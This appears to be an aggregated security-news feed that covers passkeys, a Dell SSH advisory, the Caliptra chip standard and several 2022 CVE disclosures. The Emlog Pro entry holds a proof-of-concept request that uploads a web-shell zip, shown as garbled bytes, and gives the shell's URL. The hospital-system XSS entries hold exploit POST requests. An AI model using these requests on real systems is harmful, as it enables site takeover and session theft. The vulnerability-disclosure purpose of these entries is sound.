Categories: Podcast
This past summer, a woman's bag was stolen from her gym locker in London. Just hours later, thousands of pounds had been drained from her bank. 



(Read more...)




The post A gym heist in London goes cyber appeared first on Malwarebytes Labs.

Posted: October 24, 2022 by

A thief has been stalking London. 

This past summer, multiple women reported similar crimes to the police: While working out at their local gyms, someone snuck into the locker rooms, busted open their locks, stole their rucksacks and gym bags, and then, within hours, purchased thousands of pounds of goods. Apple, Selfridges, Balenciaga, Harrod's—the thief has expensive taste. 

At first blush, the crimes sound easy to explain: A thief stole credit cards and used them in person at various stores before they could be caught. 

But for at least one victim, the story is more complex.  

In August, Charlotte Morgan had her bag stolen during an evening workout at her local gym in Chiswick. The same pattern of high-price spending followed—the thief spent nearly £3,000 at an Apple store in West London, another £1,000 at a separate Apple store, and then almost £700 at Selfridges. But upon learning just how much the thief had spent, Morgan realized something was wrong: She didn't have that much money in her primary account. To access all of her funds, the thief would have needed to make a transfer out of her savings account, which would have required the use of her PIN. 

"\[My PIN is\] not something they could guess... So I thought 'That's impossible,'" Morgan told the Lock and Code podcast. But, after several calls with her bank and in discussions with some cybersecurity experts, she realized there could be a serious flaw with her online banking app. "But the bank... what they failed to mention is that every customer's PIN can actually be viewed on the banking app once you logged in."

Today on the Lock and Code podcast with host David Ruiz, we speak with Charlotte Morgan about what happened this past summer in London, what she did as she learned about the increasing theft of her funds, and how one person could so easily abuse her information. 

Tune in today to also learn about what you can do to help protect yourself from this type of crime. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

A gym heist in London goes cyber

Nok Nok, an inventor of FIDO authentication standards, announces full support for passkeys in its S3 Authentication Suite that allows organizations to replace passwords.

**San Jose, Calif., Oct. 24, 2022** — Nok Nok, a leader in FIDO customer authentication (Fast IDentity Online) and a founder of the FIDO Alliance, today announced full support for passkeys — the FIDO and key-based passwordless sign-in technology standard for replacing passwords.

As stated in Verizon’s 2021 Data Breach Investigations Report, over 80% of successful cyber-attacks start with an account takeover with cybercriminals using sophisticated phishing strategies to steal account credentials based on passwords and personal secrets. With cybercrime accelerating dramatically, online service providers are now only beginning to understand the real cost and risk of propagating the use of passwords and the legacy security infrastructure used to store and use them.

**The arrival of passkeys, the replacement for passwords**

Passkeys — the new name for passwordless FIDO credentials — are widely viewed as the replacement to end the use of passwords. Current FIDO standards for single-device passkeys are supported by major platforms today. In May 2022, Apple, Microsoft and Google announced multi-device passkeys will be natively available in the OEMs’ devices, operating systems and platforms to enable safer, faster, and more consistent sign-ins to consumer online services across web and mobile devices.

By offering the same safety and convenience for signing into online services as the trusted biometric authentication consumers use to sign into their devices, FIDO passkeys offer consumers modern, safe and fast access to all of their online services and in the future, to their in-home and IoT devices, and even to their vehicles.

To implement passkeys, online service providers must leverage a FIDO authentication server and related client software to support both single-device and multi-device passkeys.

**S3’s innovative approach to passkeys**

As an early inventor of FIDO specifications, Nok Nok and its S3 Authentication Suite offer the first customer passwordless authentication platform built from the ground up based on FIDO standards, with full support for both single-device and multi-device passkeys. Nok Nok’s S3 Suite provides privacy-compliant, passwordless authentication across platforms and is designed to operate in the most demanding consumer environments, at global scale. Nok Nok’s S3 Authentication Server also offers FIDO features that enable online service providers to offer safe and secure passkey access to consumer services leveraging home, entertainment and IoT devices.

For companies that have not yet incorporated FIDO-enabled technologies into their services, with the Nok Nok S3 solution they can now support traditional FIDO single-device credentials and the latest multi-device passkeys with a single authentication infrastructure. For companies who have already transitioned some or all of their customer authentication to leverage FIDO standards, with the Nok Nok S3 solution they can fully support passkey credentials with no code changes. For Nok Nok customers already supporting Nok Nok iOS FIDO authentication, the currently available passkeys “just-work.”

As stated by Dr. Rolf Lindemann, Nok Nok’s VP of Products and one of the original authors of the FIDO standard, “_Nok Nok has been working with the industry and our large customers to operationalize the FIDO protocols in the real world with real world benefits. This discipline of commercializing FIDO innovations has led to an extensive portfolio of patented FIDO capabilities and to the evolution from single device keys to multi-device passkeys.”_

Dr. Lindemann shared, _“For our customers who have already adopted our S3 platform, no code changes are required to support passkeys on iOS 16+ and we support the device public key option announced for Google’s Android. Additionally, our S3 Suite allows native consumer apps to combine single-device credentials through FIDO “silent authenticators” with multi-device credentials to improve the control of relying parties - even on platforms not supporting the device public key option, simplifying regulatory compliance.”_

The advanced granular adaptive orchestration of Nok Nok’s S3 authentication platform includes a rules engine that allows replying parties to easily configure sign-up, sign-in and recovery flows for passkeys that dynamically respond to contextual user data. In addition, Nok Nok’s S3 Intelligent Passwordless AuthenticationTM enables user experience flows to automatically respond to the (FIDO) authenticator characteristics of their consumers’ devices in real-time with passkeys.

**The FIDO benefits trifecta**

By making use of authentication signals on consumer devices, with FIDO sign-up and sign-in, Nok Nok’s customers have created seamless user experiences that remove friction and complexity associated with authentication and account recovery, which dramatically increases the speed and success rates of sign-in.

Many of Nok Nok’s banking, telco and fintech customers have achieved sign-in success rates of 99.5% and sign-in speed increases of 100% to 200% - with today’s single-device passkeys. Since multi-device passkeys are expected to dramatically increase consumer FIDO adoption across OEM devices, these substantial benefits are now available to all online service providers who support passkeys by implementing a leading FIDO server with robust authentication capabilities such as Nok Nok’s S3 Suite.

In addition, reductions in sign-up, sign-in and account recovery friction result in a material reduction of calls into customer care centers. At an industry-average cost of $70-$90 per call to remediate account-related problems, the adoption of FIDO passkeys can save online service providers millions of dollars in annual OPEX.

Last but most important, FIDO passkeys protect consumers from account takeovers that start with stolen credentials. Passkeys are described as “phishing-resistant”, although some of the OEMs have stated passkeys are “unphishable”. In sign-ins that only use passkeys, the keys are accessed during sign-in, but passkeys remain on the device and server. The keys are never passed for attackers to steal enroute - protecting consumers from sophisticated phishing attacks.

“_Ten years ago our founding industry group designed FIDO as a new framework for providing better usability, security and privacy. We also intended the framework to reduce the cost and complexity of enterprise infrastructure. Today, FIDO passkeys offer the trifecta of business benefits — improved customer security and privacy with less friction and lower operating cost to the enterprise. Passwords are the single greatest pain point on the internet and at Nok Nok, we are thrilled to announce our seamless platform support for consumer passkeys — signaling the beginning of the end of passwords worldwide,” said Nok Nok CEO Phillip Dunkelberger._

**About Nok Nok**

Nok Nok is a global leader in passwordless consumer authentication. Delivering the most innovative FIDO services for the authentication market today, Nok Nok empowers global organizations to dramatically improve their user experience and security, and reduce operating expenses, while meeting the most advanced privacy and regulatory requirements. The Nok Nok™ S3 Authentication Suite integrates into existing security environments to deliver proven, FIDO-standards-based passwordless consumer authentication. Headquartered in Silicon Valley, California, the company has delivered unique inventions and innovations that are protected by a robust global patent portfolio. As a founder of the FIDO Alliance and an innovator of FIDO standards, Nok Nok is an expert in modern consumer authentication. Nok Nok’s global customers trust their customer authentication with the S3 platform and include Verizon, Intuit, T-Mobile, BBVA, NTT Docomo, MUFG, Japan Post Bank, AFLAC, Standard Bank, Fujitsu Limited, and Hitachi. For more information, visit www.noknok.com.

Nok Nok, a Global Leader in Customer Passwordless Authentication, Releases Full Support for Passkeys

The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.

**Vaikutus**

Medium

**Overview**

**Summary:**      
The SSHD configuration within Dell EMC Isilon OneFS requires a remediation to address a vulnerability. 

**Tiedot**

*    **Incorrect Default Permissions Vulnerability**

CVE-2020-5355

The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.

CVSS v3.1 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

*    **Incorrect Default Permissions Vulnerability**

CVE-2020-5355

The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended.

CVSS v3.1 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Affected products:**     
Dell EMC Isilon OneFS versions 8.2.2 and earlier.

For Dell EMC Isilon OneFS versions 8.2.2 and earlier, see the Workaround section below.

**Workaround:**      
There are three options available to workaround this issue:   

*   Disable users with restricted shells (by default, only the remotesupport user).
*   Modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for all users.
*   For OneFS versions prior to 8.2.0 only, modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

  
**Disable users with restricted shells**

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following command:   
    

**isi auth users modify remotesupport --enabled=false**

  
**Disable forwarding of UNIX domain and TCP sockets**  
**For 8.2.0 and later:**   

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following commands:    
    

**isi\_gconfig -t ssh-config allow\_tcp\_forwarding=no  
isi\_gconfig -t ssh-config allow\_stream\_local\_forwarding=no**

  
**Versions prior to 8.2.0**

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, set the following in the /etc/mcp/templates/sshd\_config file:    
    

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note: (Versions prior to 8.2.0 only)** Modify the SSH server config to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, append the following to the end of the /etc/mcp/templates/sshd\_config file:    
    

**Match User remotesupport**

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note:** To make these settings persist, see KB article 530021: {Isilon} - SSH: How to modify the the sshd\_config file to persist upgrades

**CAUTION:** The Match keyword will open a conditional block that applies until either another Match line or the end of the file. If a keyword appears in multiple Match blocks that are satisfied, only the first instance of the keyword is applied.

  

**Affected products:**     
Dell EMC Isilon OneFS versions 8.2.2 and earlier.

For Dell EMC Isilon OneFS versions 8.2.2 and earlier, see the Workaround section below.

**Workaround:**      
There are three options available to workaround this issue:   

*   Disable users with restricted shells (by default, only the remotesupport user).
*   Modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for all users.
*   For OneFS versions prior to 8.2.0 only, modify the SSH server configuration to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

  
**Disable users with restricted shells**

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following command:   
    

**isi auth users modify remotesupport --enabled=false**

  
**Disable forwarding of UNIX domain and TCP sockets**  
**For 8.2.0 and later:**   

1.  Open a secure shell (SSH) connection to any node in the cluster and log in as root.
    
2.  Run the following commands:    
    

**isi\_gconfig -t ssh-config allow\_tcp\_forwarding=no  
isi\_gconfig -t ssh-config allow\_stream\_local\_forwarding=no**

  
**Versions prior to 8.2.0**

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, set the following in the /etc/mcp/templates/sshd\_config file:    
    

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note: (Versions prior to 8.2.0 only)** Modify the SSH server config to disable forwarding of UNIX domain and TCP sockets for users with restricted shells.

1.  Open a secure shell (SSH) connection to each node in the cluster and log in as root.
    
2.  On each node, append the following to the end of the /etc/mcp/templates/sshd\_config file:    
    

**Match User remotesupport**

**AllowStreamLocalForwarding=no  
AllowTcpForwarding=no**

**Note:** To make these settings persist, see KB article 530021: {Isilon} - SSH: How to modify the the sshd\_config file to persist upgrades

**CAUTION:** The Match keyword will open a conditional block that applies until either another Match line or the end of the file. If a keyword appears in multiple Match blocks that are satisfied, only the first instance of the keyword is applied.

  

**Kiitokset**

Dell would like to thank Andre Protas with Apple Information Security for reporting this issue.

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

23 marrask. 2021

CVE-2020-5355: DSA-2020-096: Dell EMC Isilon OneFS Security Update for Insecure SSHD Configuration Vulnerability

At the Authenticate Conference, Google and Microsoft demonstrated their passkey prototypes. Apple, meanwhile, already launched its version in iOS 16.

Apple, Google, and Microsoft are in the early stages of delivering on their plan to provide passkeys based on the FIDO Alliance's new passwordless authentication standard. But eliminating passwords won't happen overnight.

The three leading device and platform providers in May collectively announced they would incorporate the new passkeys into their respective platforms. Passkeys are based on the FIDO2 standard, which consists of World Wide Web Consortium's (W3C) Web Authentication (WebAuthn) specification and FIDO Alliance's Client-to-Authenticator Protocol (CTAP).

**Passkeys Start to Roll Out**

As expected, Apple became the first provider to provide passkeys with its iOS 16 release late last month, giving millions of iPhones and iPads the ability to use passkeys. Mac users will also be able to implement passkeys when Apple releases its newest operating system update, macOS Ventura, which is due to arrive this month. Last week Google released passkey betas for Android and Chrome.

Once a user sets up a passkey on one Apple device, it can synchronize with any other supported Apple client or service using iCloud Keychain. Also, when a user enrolls one device with a passkey, they can automatically enroll any other Apple device and service that supports them.

Google's passkey beta lets users create and use passkeys on their Android devices and securely sync them via Google Password Manager. Google software engineer Arnar Birgisson explained in a blog post that passkeys in Google Password Manager are always encrypted end to end.

"When a passkey is backed up, its private key is uploaded only in its encrypted form using an encryption key that is only accessible on the user's own devices," Birgisson noted. "This protects passkeys against Google itself, or e.g. a malicious attacker inside Google. Without access to the private key, such an attacker cannot use the passkey to sign-in to its corresponding online account."

**Demonstrating the Future**

Google and Microsoft demonstrated their implementations of passkeys to hundreds of identity and security experts at this week's Authenticate 2022 conference in Seattle. Google identity and security product manager Christiaan Brand demonstrated how to sign into an account with passkeys, which will appear in an Android update by December. Brand said anyone could sign up for the developer beta in the Google Play Services channel.

"The moment you sign up for this with a particular Google account, you will be able to get the latest updates on your device within a couple of minutes," Brand said. Passkeys for Chrome OS are on the road map for release next year, he added.

Brand and other identity and security experts at the conference emphasized that authenticating with passkeys is considerably more secure than passwords because they aren't vulnerable to phishing attacks or other compromises. Passkeys are also easier to use because they consist of cryptographic keys that can run on supported devices and cloud services.

Although Microsoft doesn't plan to offer passkeys in Windows until next year, the company demonstrated its implementation and shared various observations. For example, Microsoft would like to run passkeys alongside the company's Authenticator app, according to senior program manager for identity Scott Bingham.

"Passkeys are multidevice, FIDO credentials that are a really compelling solution," Bingham said. "It can be synced through a platform cloud and available to use on all your devices when you sign into the same platform account." 

While Windows Hello provides biometric authentication for unlocking a PC's OS screen, it will also enable the new passkeys.

**Integrating Online Services and Apps**

For passkeys to take off, websites and enterprises that use usernames and passwords for authentication must add support for passkeys. Thousands of organizations worldwide have deployed or are deploying FIDO authentication, enabling them to support passkeys, according to FIDO Alliance executive director Andrew Shikiar, in his opening remarks at the conference.

Among them is PayPal, which last year hired a founding member of the FIDO Alliance, Marcio Mello, as head of product for the PayPal Identity Platform. Mello said PayPal plans to offer support for passkeys in the US for a limited number of customers.

Using an iPhone with the new iOS 16, Mello demonstrated how to create a passkey with PayPal. He then explained that when using iCloud Keychain on a Mac with the updated OS, the passkey is available automatically. When using a device that doesn't yet support passkeys, if the user had already created one, they could access it by generating a QR code.

"This provides that amazing combination we've been waiting for, both convenience and security," Mello said. "Something that's absolutely required for us to be able to reach the large-scale consumer deployment that we'd be looking for worldwide."

While passwords remain the most common credentials for authentication, they are costly to organizations, according to the FIDO Alliance's Online Authentication Barometer, published this week. The study found that 59% of respondents give up accessing online accounts when they can't remember their password, and roughly 40% abandon purchases for the same reason. The survey also found that 39% are familiar with passkeys.

**Adoption Will Be Slow**

Throughout the conference, organized by the FIDO Alliance, there appeared to be widespread optimism among identity and security experts that the standardized cryptographic keys promise to pave the way to a future of passwordless authentication to devices, online services, and applications.

"Passkeys stand to take passwords out of play for hundreds of millions of consumers immediately," Shikiar said. How immediately passkeys replace passwords remains to be seen, but it will likely be years before they become mainstream, as some people signaled in their presentations.

The widespread adoption of passkeys is promising because users can reuse their credentials among different vendor ecosystems, says Gartner analyst Paul Rabinovich. Because passkeys registered on one device can complete authentication from another device, "we'll finally see wide adoption of software-based roaming authenticators" embedded as mobile apps or within operating systems, he says.

Passkey Demos Hint at What's Ahead for Passwordless Authentication

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

In the **add-patient.php** file, several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

      /\* ... \*/

if(isset($\_POST\['submit'\]))
{
    $docid=$\_SESSION\['id'\];
    $patname=$\_POST\['patname'\];
    $patcontact=$\_POST\['patcontact'\];
    $patemail=$\_POST\['patemail'\];
    $gender=$\_POST\['gender'\];
    $pataddress=$\_POST\['pataddress'\];
    $patage=$\_POST\['patage'\];
    $medhis=$\_POST\['medhis'\];
    $sql=mysqli\_query($con,"insert into tblpatient(Docid,PatientName,PatientContno,PatientEmail,PatientGender,PatientAdd,PatientAge,PatientMedhis)
values('$docid','$patname','$patcontact','$patemail','$gender','$pataddress','$patage','$medhis')");

      /\* ... \*/

In the **admin/manage-patients.php**, **doctor/manage-patient.php**, **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      /\* Example from doctor/view-patient.php\*/

$vid=$\_GET\['viewid'\];
$ret=mysqli\_query($con,"select \* from tblpatient where ID='$vid'");
$cnt=1;
while ($row=mysqli\_fetch\_array($ret)) {

    /\* ... \*/
    echo $row\['PatientName'\];
    /\* ... \*/
    echo $row\['PatientEmail'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientAdd'\];
    /\* ... \*/
    echo $row\['PatientGender'\];
    /\* ... \*/
    echo $row\['PatientMedhis'\];
    /\* ... \*/
    echo $row\['CreationDate'\];
    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **patname**, **patemail**, **gender**, **pataddress** and **medhis** POST parameters.  
The following is one of the possible exploitation using the **medhis POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: localhost
Content-Length: 180
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

patname=Name4&patcontact=3124432845&patemail=Name3%40mail.com&gender=male&pataddress=3021+Halsted+St%2C+Chicago&patage=40&medhis=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42205: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2 | Systems and Internet Security Lab

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

The files **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** share a common piece of code where several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

    /\* ... \*/

if(isset($\_POST\['submit'\]))
{

    $vid=$\_GET\['viewid'\];
    $bp=$\_POST\['bp'\];
    $bs=$\_POST\['bs'\];
    $weight=$\_POST\['weight'\];
    $temp=$\_POST\['temp'\];
    $pres=$\_POST\['pres'\];

    $query.=mysqli\_query($con,"insert tblmedicalhistory(PatientID,BloodPressure,BloodSugar,Weight,Temperature,MedicalPres) 
value('$vid','$bp','$bs','$weight','$temp','$pres')");

    
    /\* ... \*/

In the same files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      
    /\* ...\*/

while ($row=mysqli\_fetch\_array($ret)) { 

    echo $cnt;
    echo $row\['BloodPressure'\];
    echo $row\['Weight'\];
    echo $row\['BloodSugar'\];
    echo $row\['Temperature'\];
    echo $row\['MedicalPres'\];
    echo $row\['CreationDate'\];

    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **bp**, **bs**, **weight**, **temp** and **pres** POST parameters.  
The following is one of the possible exploitation using the **pres POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3 HTTP/1.1
Host: localhost
Content-Length: 94
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

bp=120%2F85&bs=12&weight=70kg&temp=36&pres=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42206: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3 | Systems and Internet Security Lab

Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.

    POST /emlog/admin/plugin.php?action=upload_zip HTTP/1.1
    Host: 192.168.111.155
    Content-Length: 876
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.111.155
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary804UeairFtrET9Lt
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.111.155/emlog/admin/plugin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lq0s731hnlqm232itjlgpc27el; EM_AUTHCOOKIE_jT79impSwTWeimzUBIsgAmv1NoQbG2Zs=admin%7C1695536025%7C848fc865191736412177851eb6082b92; em_saveLastTime=1664436503884
    Connection: close
    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="pluzip"; filename="shell.zip"
    Content-Type: application/x-zip-compressed
    
    PK���   � Mq=Ua郵/?    �  �   shell/shell.php=?K聾 嗺凔�78h嘍�2渹�v�裫]Dと??$W称��"XjQ皛Q礑??轌3?乿}哏}y��=觾@/@癴撰杻V+5倯x岹儊竲哷孁佸:�蚷?猏Z?,揱戏<氉�賬岈ノ�湞獈煶埑'R齿獙哮甙!?>靾?綱漜晅U?砭7it愴矐堬%{L�z�悏雀╊>��栮詔}岒O懘e隿�鍶趣?爱嘺ㄥ愭�
    AA噣霿扉┹Rq絓茇?cgf?PK���     Bq=U            �   shell/PK��? �   � Mq=Ua郵/?    �  � $               shell/shell.php
           � � F柑)视?F柑)视?�[秤?PK��? �     Bq=U            � $       �   *�  shell/
           � � 棦��视?�8?视?纳�爻迂�PK��    � � ?   N�    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="token"
    
    4e1bef9d513bae43a46448cbbaee0db7d1d5f7d1
    ------WebKitFormBoundary804UeairFtrET9Lt--
    
    

    http://192.168.111.155//emlog/content/plugins/shell/shell.php

CVE-2022-42189: cms_vul/emlog_pro_1.6.0_rce.md at main · wszdhf/cms_vul

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

CVE-2022-36957: Published | Zero Day Initiative

CVE-2022-38108: Published | Zero Day Initiative

The new open source specification from Open Compute Project is backed by Google, Nvidia, Microsoft, and AMD.

Some of the top names in the hardware industry have joined forces to create common technologies to enhance security in the cloud.

Google, Nvidia, Microsoft, and AMD partnered to establish Caliptra, an open specification to embed security mechanisms inside chips. The spec, which is open source and free to license, was announced on Tuesday at the Open Compute Project Summit, being held in Santa Clara, Calif. The participating companies are members of the Open Compute Project (OCP), which will maintain the development of the specification along with the Linux Foundation.

The Caliptra project revolves around establishing a root of trust (RoT) — building security layers into silicon so data is encrypted and not exposed as it travels in data centers or the cloud.  

"We need to embed that capability in silicon. At some point in the future, it's not going to be enough to have it on the motherboard, for example in the server as a separate piece of circuitry," said Cliff Grossner, vice president of market intelligence at OCP, during a press briefing.

Caliptra expands the security boundaries of data from the chip level to the cloud. The specification provides common language for chip makers and cloud providers to create technologies around confidential computing, which is gaining attention as a way to protect data while it is in storage, in transit, or being processed in the cloud.

"With the rise of edge computing, the resultant growth in the exposed attack surface also presents a need for stronger physical security solutions," wrote Mark Russinovich, Microsoft CTO for Azure, in a Tuesday blog post about Caliptra.

**Defining Open Source Confidential Computing**

Vulnerabilities like Spectre and Meltdown showed hackers could steal data by attacking hardware. Intel and AMD, whose CPUs dominate the data center and cloud infrastructure, are adding proprietary features to lock down data at the chip level, but Caliptra is being pitched as a viable open source alternative.

The specification defines a reusable silicon block that can be dropped into chips and devices to establish an RoT. The silicon block provides verifiable cryptographic assurances that the chip security configuration is correct. It also provides a mechanism within the chip to ensure that the boot code can be trusted.

"This represents an enhancement over existing solutions today, and we expect that this will meet the enhanced security requirements for edge and confidential computing going forward," OCP's Grossner said.

The specification includes mechanisms to protect data from a range of electromagnetic, side-channel, and other common attacks. But Caliptra does not cover emerging attack vectors like quantum computers, which will provide the means to crack advanced encryption in just seconds.

The Caliptra specification also covers major aspects of attestation, which is more of a chip-level handshake to ensure that only authorized parties get access to data stored in hardware enclaves. The RoT blocks in a chip isolate the data, while providing an effective mechanism to verify the authenticity and integrity of code, firmware, and other security assets.

**Securing the Enterprise Cloud**

The first Caliptra spec, version 0.5, can be prototyped on field-programmable gate arrays before being implemented into final chip designs. The specification document points to the technology being geared for enterprise computing infrastructures rather than home or business PCs.

The tenets of Caliptra, which include authentication, detection, and recovery, tilt heavily toward establishing a silicon RoT for server and edge chips, which are built differently than PC chips.

Microsoft is using attestation based on Trusted Platform Module (TPM) chips as a security mechanism for Windows 10 and 11 operating systems. The company's Pluton security chip, which has a TPM built in and can be used for attestation, has largely been rejected by the wider PC industry.

Microsoft and Google executives didn't say whether or when they would make Caliptra a part of their cloud services. Microsoft last week expanded the use of AMD's SNP-SEV technology for confidential computing in the cloud. Azure also offers virtual machine instances with Intel's proprietary SGX security enclave.

**Expanding the Open Compute Project**

The Open Compute Project was established in 2011 by the likes of Google and Meta (then Facebook), which were buying thousands of servers and looking to standardize on hardware designs in their mega data centers. The goal was to reduce the server build times and cut costs by stripping off unnecessary components.

OCP has since grown into a powerhouse that counts all major infrastructure hardware providers as members — with the exception of Apple and Amazon, which rely on internally designed hardware.

OCP guidelines also include power, cooling, storage, and networking specifications that are now widely adopted. The OCP has also inspired nontech companies, largely in the financial sector, to experiment and develop standardized servers for on-premises data centers.

"We have the industry leaders coming together here within the OCP community, and we want to bring the standardized facility architecture for deployed servers," Grossner said. "Server security will become scalable."

Servers previously largely depended on CPUs, but now include different computing devices such as GPUs to handle applications like artificial intelligence. Standardizing the server security architecture was a top priority for company executives addressing media during the OCP call.

"This ecosystem we all play in — it starts with trust you have ... in your computing. We were on a path to have a number of bifurcated solutions, and that's just not good for anyone," said Mark Papermaster, chief technology officer at AMD, during the call.

Tag

#apple